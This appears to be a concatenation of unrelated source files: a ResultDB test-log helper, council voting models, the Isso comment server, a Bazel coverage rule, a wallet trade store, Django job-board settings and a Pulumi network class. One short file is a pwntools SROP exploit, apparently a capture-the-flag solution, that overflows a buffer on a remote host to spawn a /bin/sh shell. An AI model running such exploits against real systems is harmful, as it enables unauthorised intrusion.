luci.resultdb.v1.TestResult object """ for tag in test_result.tags or []: if tag.key == "test_name": return tag.value logging.warning("There is no test name for test_id: %s", test_result.test_id) return None @staticmethod def summary_html_for_test_result(test_result): return test_result.summary_html or "" @staticmethod def test_type_for_test_result(test_result): """Return a ResultDBTestType for test_result""" if "blink_web_tests" in test_result.test_id: return ResultDBTestType.BLINK if test_result.tags: for tag in test_result.tags: if "gtest" in tag.key: return ResultDBTestType.GTEST return ResultDBTestType.OTHER @staticmethod def test_location_for_test_result(test_result): """Return test location for test_result""" if (not test_result.test_metadata or not test_result.test_metadata.location or not test_result.test_metadata.location.file_name): return None return { "line": test_result.test_metadata.location.line, "file": test_result.test_metadata.location.file_name } @staticmethod def get_detailed_failure_log(test_type, failure_log): """Gets the detailed failure log from artifact if possible For gtest, if there is stack_trace artifact, download the content of the artifact. Otherwise, just return summaryHTML Argument: test_type: ResultDBTestType failure_log: Dictionary of {"name":..., "summary_html":...} Returns: A string for the detailed failure logs """ summary_html = failure_log["summary_html"] if test_type != ResultDBTestType.GTEST: return summary_html # We only check for "stack_trace" artifact if "stack_trace" presents in # summary_html if "stack_trace" not in summary_html: return summary_html test_result_name = failure_log["name"] artifacts = resultdb.list_artifacts(test_result_name) or [] stack_trace_artifact = next( (a for a in artifacts if a.artifact_id == "stack_trace"), None) if not stack_trace_artifact: return summary_html fetch_url = stack_trace_artifact.fetch_url content, error = http_client_util.SendRequestToServer( fetch_url, _FINDIT_HTTP_CLIENT) if not error: return content logging.warning("Unable to fetch content from %s: %s", fetch_url, error) return summary_html
py
1a3f61846c5ecfa4a855eb08fa250b19537e1f31
from application import db from sqlalchemy.orm import relationship class Sessao(db.Model): id = db.Column(db.Integer, primary_key=True) nome = db.Column(db.Text) data = db.Column(db.Date()) votacao = relationship("Votacao", back_populates="sessao") class Partido(db.Model): id = db.Column(db.Integer, primary_key=True) nome = db.Column(db.Text) vereador = db.relationship('Vereador', backref='partido', lazy='dynamic') class Vereador(db.Model): id = db.Column(db.Integer, primary_key=True) nome = db.Column(db.Text) idparlamentar = db.Column(db.Integer) partido_id = db.Column(db.Integer, db.ForeignKey('partido.id')) votos = relationship("Voto", back_populates="vereador") class Votacao(db.Model): id = db.Column(db.Integer, primary_key=True) votacaoid = db.Column(db.Integer) sessao_id = db.Column(db.Integer, db.ForeignKey('sessao.id')) tipo = db.Column(db.Text) materia = db.Column(db.Text) ementa = db.Column(db.Text) resultado = db.Column(db.Text) presentes = db.Column(db.Integer) sim = db.Column(db.Integer) nao = db.Column(db.Integer) abstencao = db.Column(db.Integer) branco = db.Column(db.Integer) notas_rodape = db.Column(db.Text) votos = relationship("Voto", back_populates="votacao") sessao = relationship("Sessao", back_populates="votacao") class Voto(db.Model): id = db.Column(db.Integer, primary_key=True) votacao_id = db.Column(db.Integer, db.ForeignKey('votacao.id')) vereador_id = db.Column(db.Integer, db.ForeignKey('vereador.id')) valor = db.Column(db.Text) vereador = relationship("Vereador", back_populates="votos") votacao = relationship("Votacao", back_populates="votos")
py
1a3f62fe49ddb034742bf023d9d2d51b1b5c1667
#!/usr/bin/env python # -*- encoding: utf-8 -*- # # The MIT License (MIT) # # Copyright (c) 2012-2014 Martin Zimmermann. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # Isso – a lightweight Disqus alternative from __future__ import print_function, unicode_literals import pkg_resources dist = pkg_resources.get_distribution("isso") # check if exectuable is `isso` and gevent is available import sys if sys.argv[0].startswith("isso"): try: import gevent.monkey gevent.monkey.patch_all() except ImportError: pass import os import errno import logging import tempfile from os.path import dirname, join from argparse import ArgumentParser from functools import partial, reduce import pkg_resources werkzeug = pkg_resources.get_distribution("werkzeug") from itsdangerous import URLSafeTimedSerializer from werkzeug.routing import Map from werkzeug.exceptions import HTTPException, InternalServerError from werkzeug.middleware.shared_data import SharedDataMiddleware from werkzeug.local import Local, LocalManager from werkzeug.serving import run_simple from werkzeug.middleware.proxy_fix import ProxyFix from werkzeug.middleware.profiler import ProfilerMiddleware local = Local() local_manager = LocalManager([local]) from isso import config, db, db_psql, migrate, wsgi, ext, views from isso.core import ThreadedMixin, ProcessMixin, uWSGIMixin from isso.wsgi import origin, urlsplit from isso.utils import http, JSONRequest, html, hash from isso.views import comments from isso.ext.notifications import Stdout, SMTP logging.getLogger('werkzeug').setLevel(logging.WARN) logging.basicConfig( level=logging.INFO, format="%(asctime)s %(levelname)s: %(message)s") logger = logging.getLogger("isso") class ProxyFixCustom(ProxyFix): def __init__(self, app): # This is needed for werkzeug.wsgi.get_current_url called in isso/views/comments.py # to work properly when isso is hosted under a sub-path # cf. https://werkzeug.palletsprojects.com/en/1.0.x/middleware/proxy_fix/ super().__init__(app, x_prefix=1) class Isso(object): def __init__(self, conf): self.conf = conf db_type = conf.get('general', 'db-type') if db_type == 'psql': self.db = db_psql.PSQL(conf.get('general', 'dbpath'), conf) else: self.db = db.SQLite3(conf.get('general', 'dbpath'), conf) self.signer = URLSafeTimedSerializer( self.db.preferences.get("session-key")) self.markup = html.Markup(conf.section('markup')) self.hasher = hash.new(conf.section("hash")) super(Isso, self).__init__(conf) subscribers = [] smtp_backend = False for backend in conf.getlist("general", "notify"): if backend == "stdout": subscribers.append(Stdout(None)) elif backend in ("smtp", "SMTP"): smtp_backend = True else: logger.warn("unknown notification backend '%s'", backend) if smtp_backend or conf.getboolean("general", "reply-notifications"): subscribers.append(SMTP(self)) self.signal = ext.Signal(*subscribers) self.urls = Map() views.Info(self) views.Metrics(self) comments.API(self, self.hasher) def render(self, text): return self.markup.render(text) def sign(self, obj): return self.signer.dumps(obj) def unsign(self, obj, max_age=None): return self.signer.loads(obj, max_age=max_age or self.conf.getint('general', 'max-age')) def dispatch(self, request): local.request = request local.host = wsgi.host(request.environ) local.origin = origin(self.conf.getiter( "general", "host"))(request.environ) adapter = self.urls.bind_to_environ(request.environ) try: handler, values = adapter.match() except HTTPException as e: return e else: try: response = handler(request.environ, request, **values) except HTTPException as e: return e except Exception: logger.exception("%s %s", request.method, request.environ["PATH_INFO"]) return InternalServerError() else: return response def wsgi_app(self, environ, start_response): response = self.dispatch(JSONRequest(environ)) return response(environ, start_response) def __call__(self, environ, start_response): return self.wsgi_app(environ, start_response) def make_app(conf=None, threading=True, multiprocessing=False, uwsgi=False): if not any((threading, multiprocessing, uwsgi)): raise RuntimeError("either set threading, multiprocessing or uwsgi") if threading: class App(Isso, ThreadedMixin): pass elif multiprocessing: class App(Isso, ProcessMixin): pass else: class App(Isso, uWSGIMixin): pass isso = App(conf) # check HTTP server connection for host in conf.getiter("general", "host"): with http.curl('HEAD', host, '/', 5) as resp: if resp is not None: logger.info("connected to %s", host) break else: logger.warn("unable to connect to your website, Isso will probably not " "work correctly. Please make sure, Isso can reach your " "website via HTTP(S).") wrapper = [local_manager.make_middleware] if isso.conf.getboolean("server", "profile"): wrapper.append(partial(ProfilerMiddleware, sort_by=("cumulative", ), restrictions=("isso/(?!lib)", 10))) wrapper.append(partial(SharedDataMiddleware, exports={ '/js': join(dirname(__file__), 'js/'), '/css': join(dirname(__file__), 'css/'), '/img': join(dirname(__file__), 'img/'), '/demo': join(dirname(__file__), 'demo/') })) wrapper.append(partial(wsgi.CORSMiddleware, origin=origin(isso.conf.getiter("general", "host")), allowed=("Origin", "Referer", "Content-Type"), exposed=("X-Set-Cookie", "Date"))) wrapper.extend([wsgi.SubURI, ProxyFixCustom]) if werkzeug.version.startswith("0.8"): wrapper.append(wsgi.LegacyWerkzeugMiddleware) return reduce(lambda x, f: f(x), wrapper, isso) def main(): parser = ArgumentParser(description="a blog comment hosting service") subparser = parser.add_subparsers(help="commands", dest="command") parser.add_argument('--version', action='version', version='%(prog)s ' + dist.version) parser.add_argument("-c", dest="conf", default="/etc/isso.conf", metavar="/etc/isso.conf", help="set configuration file") imprt = subparser.add_parser('import', help="import Disqus XML export") imprt.add_argument("dump", metavar="FILE") imprt.add_argument("-n", "--dry-run", dest="dryrun", action="store_true", help="perform a trial run with no changes made") imprt.add_argument("-t", "--type", dest="type", default=None, choices=["disqus", "wordpress", "generic"], help="export type") imprt.add_argument("--empty-id", dest="empty_id", action="store_true", help="workaround for weird Disqus XML exports, #135") # run Isso as stand-alone server subparser.add_parser("run", help="run server") args = parser.parse_args() conf = config.load( join(dist.location, dist.project_name, "defaults.ini"), args.conf) if args.command == "import": conf.set("guard", "enabled", "off") if args.dryrun: xxx = tempfile.NamedTemporaryFile() dbpath = xxx.name else: dbpath = conf.get("general", "dbpath") mydb = db.SQLite3(dbpath, conf) migrate.dispatch(args.type, mydb, args.dump, args.empty_id) sys.exit(0) if conf.get("general", "log-file"): handler = logging.FileHandler(conf.get("general", "log-file")) logger.addHandler(handler) logging.getLogger("werkzeug").addHandler(handler) logger.propagate = False logging.getLogger("werkzeug").propagate = False if not any(conf.getiter("general", "host")): logger.error("No website(s) configured, Isso won't work.") sys.exit(1) if conf.get("server", "listen").startswith("http://"): host, port, _ = urlsplit(conf.get("server", "listen")) try: from gevent.pywsgi import WSGIServer WSGIServer((host, port), make_app(conf)).serve_forever() except ImportError: run_simple(host, port, make_app(conf), threaded=True, use_reloader=conf.getboolean('server', 'reload')) else: sock = conf.get("server", "listen").partition("unix://")[2] try: os.unlink(sock) except OSError as ex: if ex.errno != errno.ENOENT: raise wsgi.SocketHTTPServer(sock, make_app(conf)).serve_forever()
bzl
1a3f6447fd07a61a7fdbdda11bdda877726aea44
# Copyright 2018 The Bazel Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Coverage report generation.""" load("@bazel_tools//tools/build_defs/repo:git.bzl", "new_git_repository") _LCOV_BUILD_FILE_CONTENT = """ filegroup( name = "bin", srcs = glob(["bin/**/*"]), visibility = ["//visibility:public"], ) """ def bazel_coverage_report_repositories(): """Add to the WORKSPACE external dependencies needed by the generator. """ if "lcov" not in native.existing_rules(): new_git_repository( name = "lcov", build_file_content = _LCOV_BUILD_FILE_CONTENT, commit = "a5dd9529f9232b8d901a4d6eb9ae54cae179e5b3", remote = "https://github.com/linux-test-project/lcov.git", )
py
1a3f64c5ed1306924043598969eeed5c125fa7aa
from typing import List, Optional import aiosqlite from aloe.types.blockchain_format.sized_bytes import bytes32 from aloe.types.mempool_inclusion_status import MempoolInclusionStatus from aloe.util.db_wrapper import DBWrapper from aloe.util.errors import Err from aloe.util.ints import uint8, uint32 from aloe.wallet.trade_record import TradeRecord from aloe.wallet.trading.trade_status import TradeStatus class TradeStore: """ TradeStore stores trading history. """ db_connection: aiosqlite.Connection cache_size: uint32 db_wrapper: DBWrapper @classmethod async def create(cls, db_wrapper: DBWrapper, cache_size: uint32 = uint32(600000)): self = cls() self.cache_size = cache_size self.db_wrapper = db_wrapper self.db_connection = db_wrapper.db await self.db_connection.execute("pragma journal_mode=wal") await self.db_connection.execute("pragma synchronous=2") await self.db_connection.execute( ( "CREATE TABLE IF NOT EXISTS trade_records(" " trade_record blob," " trade_id text PRIMARY KEY," " status int," " confirmed_at_index int," " created_at_time bigint," " sent int)" ) ) await self.db_connection.execute( "CREATE INDEX IF NOT EXISTS trade_confirmed_index on trade_records(confirmed_at_index)" ) await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_status on trade_records(status)") await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_id on trade_records(trade_id)") await self.db_connection.commit() return self async def _clear_database(self): cursor = await self.db_connection.execute("DELETE FROM trade_records") await cursor.close() await self.db_connection.commit() async def add_trade_record(self, record: TradeRecord, in_transaction) -> None: """ Store TradeRecord into DB """ if not in_transaction: await self.db_wrapper.lock.acquire() try: cursor = await self.db_connection.execute( "INSERT OR REPLACE INTO trade_records VALUES(?, ?, ?, ?, ?, ?)", ( bytes(record), record.trade_id.hex(), record.status, record.confirmed_at_index, record.created_at_time, record.sent, ), ) await cursor.close() finally: if not in_transaction: await self.db_connection.commit() self.db_wrapper.lock.release() async def set_status(self, trade_id: bytes32, status: TradeStatus, in_transaction: bool, index: uint32 = uint32(0)): """ Updates the status of the trade """ current: Optional[TradeRecord] = await self.get_trade_record(trade_id) if current is None: return None confirmed_at_index = current.confirmed_at_index if index != 0: confirmed_at_index = index tx: TradeRecord = TradeRecord( confirmed_at_index=confirmed_at_index, accepted_at_time=current.accepted_at_time, created_at_time=current.created_at_time, my_offer=current.my_offer, sent=current.sent, spend_bundle=current.spend_bundle, tx_spend_bundle=current.tx_spend_bundle, additions=current.additions, removals=current.removals, trade_id=current.trade_id, status=uint32(status.value), sent_to=current.sent_to, ) await self.add_trade_record(tx, in_transaction) async def increment_sent( self, id: bytes32, name: str, send_status: MempoolInclusionStatus, err: Optional[Err], ) -> bool: """ Updates trade sent count (Full Node has received spend_bundle and sent ack). """ current: Optional[TradeRecord] = await self.get_trade_record(id) if current is None: return False sent_to = current.sent_to.copy() err_str = err.name if err is not None else None append_data = (name, uint8(send_status.value), err_str) # Don't increment count if it's already sent to this peer if append_data in sent_to: return False sent_to.append(append_data) tx: TradeRecord = TradeRecord( confirmed_at_index=current.confirmed_at_index, accepted_at_time=current.accepted_at_time, created_at_time=current.created_at_time, my_offer=current.my_offer, sent=uint32(current.sent + 1), spend_bundle=current.spend_bundle, tx_spend_bundle=current.tx_spend_bundle, additions=current.additions, removals=current.removals, trade_id=current.trade_id, status=current.status, sent_to=sent_to, ) await self.add_trade_record(tx, False) return True async def set_not_sent(self, id: bytes32): """ Updates trade sent count to 0. """ current: Optional[TradeRecord] = await self.get_trade_record(id) if current is None: return None tx: TradeRecord = TradeRecord( confirmed_at_index=current.confirmed_at_index, accepted_at_time=current.accepted_at_time, created_at_time=current.created_at_time, my_offer=current.my_offer, sent=uint32(0), spend_bundle=current.spend_bundle, tx_spend_bundle=current.tx_spend_bundle, additions=current.additions, removals=current.removals, trade_id=current.trade_id, status=uint32(TradeStatus.PENDING_CONFIRM.value), sent_to=[], ) await self.add_trade_record(tx, False) async def get_trade_record(self, trade_id: bytes32) -> Optional[TradeRecord]: """ Checks DB for TradeRecord with id: id and returns it. """ cursor = await self.db_connection.execute("SELECT * from trade_records WHERE trade_id=?", (trade_id.hex(),)) row = await cursor.fetchone() await cursor.close() if row is not None: record = TradeRecord.from_bytes(row[0]) return record return None async def get_trade_record_with_status(self, status: TradeStatus) -> List[TradeRecord]: """ Checks DB for TradeRecord with id: id and returns it. """ cursor = await self.db_connection.execute("SELECT * from trade_records WHERE status=?", (status.value,)) rows = await cursor.fetchall() await cursor.close() records = [] for row in rows: record = TradeRecord.from_bytes(row[0]) records.append(record) return records async def get_not_sent(self) -> List[TradeRecord]: """ Returns the list of trades that have not been received by full node yet. """ cursor = await self.db_connection.execute( "SELECT * from trade_records WHERE sent<? and confirmed=?", ( 4, 0, ), ) rows = await cursor.fetchall() await cursor.close() records = [] for row in rows: record = TradeRecord.from_bytes(row[0]) records.append(record) return records async def get_all_unconfirmed(self) -> List[TradeRecord]: """ Returns the list of all trades that have not yet been confirmed. """ cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed=?", (0,)) rows = await cursor.fetchall() await cursor.close() records = [] for row in rows: record = TradeRecord.from_bytes(row[0]) records.append(record) return records async def get_all_trades(self) -> List[TradeRecord]: """ Returns all stored trades. """ cursor = await self.db_connection.execute("SELECT * from trade_records") rows = await cursor.fetchall() await cursor.close() records = [] for row in rows: record = TradeRecord.from_bytes(row[0]) records.append(record) return records async def get_trades_above(self, height: uint32) -> List[TradeRecord]: cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed_at_index>?", (height,)) rows = await cursor.fetchall() await cursor.close() records = [] for row in rows: record = TradeRecord.from_bytes(row[0]) records.append(record) return records async def rollback_to_block(self, block_index): # Delete from storage cursor = await self.db_connection.execute( "DELETE FROM trade_records WHERE confirmed_at_index>?", (block_index,) ) await cursor.close() await self.db_connection.commit()
py
1a3f651a8c20a94cdcb9fc51031483fe76973d5a
""" Django settings for pyjobs project. Generated by 'django-admin startproject' using Django 1.11.5. For more information on this file, see https://docs.djangoproject.com/en/1.11/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.11/ref/settings/ """ import os from decouple import config from dj_database_url import parse as db_url from django.utils.translation import gettext_lazy as _ from unipath import Path # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) BASE_DIR_PARENT = Path(__file__).parent PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = config("SECRET_KEY") # SECURITY WARNING: don't run with debug turned on in production! DEBUG = config("DEBUG", default=False, cast=bool) ALLOWED_HOSTS = ["*"] # E-mail DEFAULT_FROM_EMAIL = config("DEFAULT_FROM_EMAIL", default="[email protected]") # Application definition INSTALLED_APPS = [ "django.contrib.admin", "django.contrib.auth", "django.contrib.contenttypes", "django.contrib.sessions", "django.contrib.messages", "django.contrib.staticfiles", "django.contrib.humanize", "django.contrib.sites", "django_extensions", "django.contrib.redirects", "pyjobs.core", "pyjobs.api", "pyjobs.marketing", "pyjobs.partners", "pyjobs.profiler", "pyjobs.synchronizer", "pyjobs.assessment", "widget_tweaks", "social_django", "django_select2", "django.contrib.sitemaps", "raven.contrib.django.raven_compat", "webpush", ] MIDDLEWARE = [ "pyjobs.middleware.RedirectFallbackMiddleware", "django.middleware.security.SecurityMiddleware", "django.middleware.locale.LocaleMiddleware", "django.contrib.sessions.middleware.SessionMiddleware", "django.middleware.common.CommonMiddleware", "django.middleware.csrf.CsrfViewMiddleware", "django.contrib.auth.middleware.AuthenticationMiddleware", "django.contrib.messages.middleware.MessageMiddleware", "django.middleware.clickjacking.XFrameOptionsMiddleware", "whitenoise.middleware.WhiteNoiseMiddleware", "social_django.middleware.SocialAuthExceptionMiddleware", ] ROOT_URLCONF = "pyjobs.urls" TEMPLATES = [ { "BACKEND": "django.template.backends.django.DjangoTemplates", "DIRS": [BASE_DIR + "/templates"], "APP_DIRS": True, "OPTIONS": { "context_processors": [ "django.template.context_processors.debug", "django.template.context_processors.request", "django.contrib.auth.context_processors.auth", "django.contrib.messages.context_processors.messages", "pyjobs.core.context_processors.global_vars", "social_django.context_processors.backends", "social_django.context_processors.login_redirect", ] }, }, ] WSGI_APPLICATION = "pyjobs.wsgi.application" # Database # https://docs.djangoproject.com/en/1.11/ref/settings/#databases DATABASES = { "default": config( "DATABASE_URL", default="sqlite:///" + BASE_DIR_PARENT.child("db.sqlite3"), cast=db_url, ) } THUMBNAILS_BASE_FOLDER = "%s/pyjobs/core/thumb/" % (BASE_DIR) # Password validation # https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator" }, {"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"}, {"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"}, {"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"}, ] # Internationalization # https://docs.djangoproject.com/en/1.11/topics/i18n/ LANGUAGE_CODE = "pt" TIME_ZONE = "America/Sao_Paulo" USE_I18N = True USE_L10N = True USE_TZ = False LOCALE_PATHS = [os.path.join(PROJECT_ROOT, "translations")] LANGUAGES = [ ("pt", _("Portuguese")), ("en", _("English")), ] # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.11/howto/static-files/ STATIC_URL = "/static/" STATIC_ROOT = os.path.join(PROJECT_ROOT, "static") STATICFILES_FINDERS = [ "django.contrib.staticfiles.finders.FileSystemFinder", "django.contrib.staticfiles.finders.AppDirectoriesFinder", ] STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, "staticfiles"),) RAVEN_CONFIG = {"dsn": config("SENTRY_DSN", default=None)} LOGIN_REDIRECT_URL = "/" LOGIN_URL = "/login" LOGOUT_REDIRECT_URL = "/" EMAIL_BACKEND = config( "EMAIL_BACKEND", default="django.core.mail.backends.console.EmailBackend" ) SENDGRID_API_KEY = config("SENDGRID_API_KEY", default=None) GA_CODE = config("GA_CODE", default="") # MailChimp MAILCHIMP_API_KEY = config("MAILCHIMP_API_KEY", default=None) MAILCHIMP_USERNAME = config("MAILCHIMP_USERNAME", default=None) MAILCHIMP_LIST_KEY = config("MAILCHIMP_LIST_KEY", default=None) # Telegram TELEGRAM_TOKEN = config("TELEGRAM_TOKEN", default=None) TELEGRAM_CHATID = config("TELEGRAM_CHATID", default=None) # Recaptcha RECAPTCHA_SECRET_KEY = config("RECAPTCHA_SECRET_KEY", default=None) # Force SSL if "DYNO" in os.environ: # pragma: no cover SECURE_SSL_REDIRECT = config("SECURE_SSL_REDIRECT", default=False) SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https") WEBSITE_NAME = config("WEBSITE_NAME", default=None) WEBSITE_SLOGAN = config("WEBSITE_SLOGAN", default=None) WEBSITE_URL = config("WEBSITE_URL", default=None) WEBSITE_OWNER_EMAIL = config("WEBSITE_OWNER_EMAIL", default=None) WEBSITE_OWNER_CELLPHONE = config("WEBSITE_OWNER_CELLPHONE", default=None) WEBSITE_GENERAL_EMAIL = config("WEBSITE_GENERAL_EMAIL", default=None) WEBSITE_WORKING_LANGUAGE = config("WEBSITE_WORKING_LANGUAGE", default=None) WEBSITE_MAILINGLIST_LINK = config("WEBSITE_MAILINGLIST_LINK", default=None) WEBSITE_OWNER_NAME = config("WEBSITE_OWNER_NAME", default=None) USER_SUBSTANTIVE = config("USER_SUBSTANTIVE", default=None) WEBSITE_HOME_URL = config("WEBSITE_HOME_URL", default=None) MAILERLITE_API_KEY = config("MAILERLITE_API_KEY", default=None) GITHUB_ACCESS_TOKEN = config("GITHUB_ACCESS_TOKEN", default=None) GITHUB_ISSUES_LABELS = config("GITHUB_ISSUES_LABELS", default=None) GITHUB_DEFAULT_REPO = config("GITHUB_DEFAULT_REPO", default=None) WEBSITE_MANAGERS_GITHUB_NICKNAME = config( "WEBSITE_MANAGERS_GITHUB_NICKNAME", default=None ) WEBPUSH_SETTINGS = { "VAPID_PUBLIC_KEY": config("VAPID_PUBLIC_KEY", default=None), "VAPID_PRIVATE_KEY": config("VAPID_PRIVATE_KEY", default=None), "VAPID_ADMIN_EMAIL": config("VAPID_ADMIN_EMAIL", default=None), } STATE_CHOICES = [ (0, _("Acre")), (1, _("Alagoas")), (2, _("Amapá")), (3, _("Amazonas")), (4, _("Bahia")), (5, _("Ceará")), (6, _("Distrito Federal")), (7, _("Espírito Santo")), (8, _("Goiás")), (9, _("Maranhão")), (10, _("Mato Grosso")), (11, _("Mato Grosso do Sul")), (12, _("Minas Gerais")), (13, _("Pará")), (14, _("Paraíba")), (15, _("Paraná")), (16, _("Pernambuco")), (17, _("Piauí")), (18, _("Rio de Janeiro")), (19, _("Rio Grande do Norte")), (20, _("Rio Grande do Sul")), (21, _("Rondônia")), (22, _("Roraima")), (23, _("Santa Catarina")), (24, _("São Paulo")), (25, _("Sergipe")), (26, _("Tocantins")), (27, _("Indeterminado")), ] SALARY_RANGES = [ (1, "0,00 - 1.000,00"), (2, "1.000,01 - 3.000,00"), (3, "3.000,01 - 6.000,00"), (4, "6.000,01 - 10.000,00"), (5, "10.000,01 - 13.000,00"), (6, "13.000,01 - 16.000,00"), (7, "16.000,01 - 19.000,00"), (8, "19.000,01 - 21.000,00"), (9, "21.000,01 - +"), (10, _("NI")), ] JOB_LEVELS = [ (1, _("Estágio")), (2, _("Junior")), (3, _("Pleno")), (4, _("Sênior")), (5, _("Indeterminado")), ] CONTRACT = [ (1, _("A combinar")), (2, _("CLT")), (3, _("PJ")), (4, _("Estágio")), ] FEEDBACK_TYPE = [(1, _("Sem feedback")), (2, _("Aprovado")), (3, _("Reprovado"))] SITE_ID = config("SITE_ID", default=1, cast=int) LINKEDIN_EMAIL = config("LINKEDIN_EMAIL", default=None) LINKEDIN_PASSWORD = config("LINKEDIN_PASSWORD", default=None) AUTHENTICATION_BACKENDS = ( "social_core.backends.github.GithubOAuth2", "social_core.backends.linkedin.LinkedinOAuth2", "django.contrib.auth.backends.ModelBackend", ) SOCIAL_AUTH_GITHUB_KEY = config("SOCIAL_AUTH_GITHUB_KEY", default=None) SOCIAL_AUTH_GITHUB_SECRET = config("SOCIAL_AUTH_GITHUB_SECRET", default=None) SOCIAL_AUTH_LINKEDIN_OAUTH2_KEY = config( "SOCIAL_AUTH_LINKEDIN_OAUTH2_KEY", default=None ) SOCIAL_AUTH_LINKEDIN_OAUTH2_SECRET = config( "SOCIAL_AUTH_LINKEDIN_OAUTH2_SECRET", default=None ) SOCIAL_AUTH_LINKEDIN_OAUTH2_SCOPE = ["r_basicprofile", "r_emailaddress"] SOCIAL_AUTH_LINKEDIN_OAUTH2_FIELD_SELECTORS = [ "email-address", "formatted-name", "public-profile-url", "picture-url", ] SOCIAL_AUTH_LINKEDIN_OAUTH2_EXTRA_DATA = [ ("id", "id"), ("formattedName", "name"), ("emailAddress", "email_address"), ("pictureUrl", "picture_url"), ("publicProfileUrl", "profile_url"), ] BLOG_API_URL = config("BLOG_API_URL", default=None)
py
1a3f65e584f271f616d964f0b504892d0676f965
from pwn import * context.arch = 'amd64' host = '5.101.72.234' port = 33074 execve_syscall_num = 59 bin_sh_addr = 0x402000 syscall = 0x40100B sigret = 0x401004 if __name__ == "__main__": #p = process( "./main" ) p = remote( host, port ) paylaod = 'a' * 72 paylaod += p64( sigret ) sigFrame = SigreturnFrame( kernel = "amd64" ) sigFrame.rax = execve_syscall_num sigFrame.rdi = bin_sh_addr sigFrame.rsi = 0 sigFrame.rdx = 0 sigFrame.rip = syscall paylaod += str( sigFrame ) p.send( paylaod + "\n" ) p.interactive()
py
1a3f669446e2c7f3b236bae5f4e11623d41df1a9
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['ConnectionArgs', 'Connection'] @pulumi.input_type class ConnectionArgs: def __init__(__self__, *, network: pulumi.Input[str], reserved_peering_ranges: pulumi.Input[Sequence[pulumi.Input[str]]], service: pulumi.Input[str]): """ The set of arguments for constructing a Connection resource. :param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering. :param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for this service provider. Note that invoking this method with a different range when connection is already established will not reallocate already provisioned service producer subnetworks. :param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a service provider organization. For Google services that support this functionality it is 'servicenetworking.googleapis.com'. """ pulumi.set(__self__, "network", network) pulumi.set(__self__, "reserved_peering_ranges", reserved_peering_ranges) pulumi.set(__self__, "service", service) @property @pulumi.getter def network(self) -> pulumi.Input[str]: """ Name of VPC network connected with service producers using VPC peering. """ return pulumi.get(self, "network") @network.setter def network(self, value: pulumi.Input[str]): pulumi.set(self, "network", value) @property @pulumi.getter(name="reservedPeeringRanges") def reserved_peering_ranges(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]: """ Named IP address range(s) of PEERING type reserved for this service provider. Note that invoking this method with a different range when connection is already established will not reallocate already provisioned service producer subnetworks. """ return pulumi.get(self, "reserved_peering_ranges") @reserved_peering_ranges.setter def reserved_peering_ranges(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]): pulumi.set(self, "reserved_peering_ranges", value) @property @pulumi.getter def service(self) -> pulumi.Input[str]: """ Provider peering service that is managing peering connectivity for a service provider organization. For Google services that support this functionality it is 'servicenetworking.googleapis.com'. """ return pulumi.get(self, "service") @service.setter def service(self, value: pulumi.Input[str]): pulumi.set(self, "service", value) @pulumi.input_type class _ConnectionState: def __init__(__self__, *, network: Optional[pulumi.Input[str]] = None, peering: Optional[pulumi.Input[str]] = None, reserved_peering_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, service: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering Connection resources. :param pulumi.Input[str] network: Name of VPC network connected with service producers using VPC peering. :param pulumi.Input[str] peering: (Computed) The name of the VPC Network Peering connection that was created by the service producer. :param pulumi.Input[Sequence[pulumi.Input[str]]] reserved_peering_ranges: Named IP address range(s) of PEERING type reserved for this service provider. Note that invoking this method with a different range when connection is already established will not reallocate already provisioned service producer subnetworks. :param pulumi.Input[str] service: Provider peering service that is managing peering connectivity for a 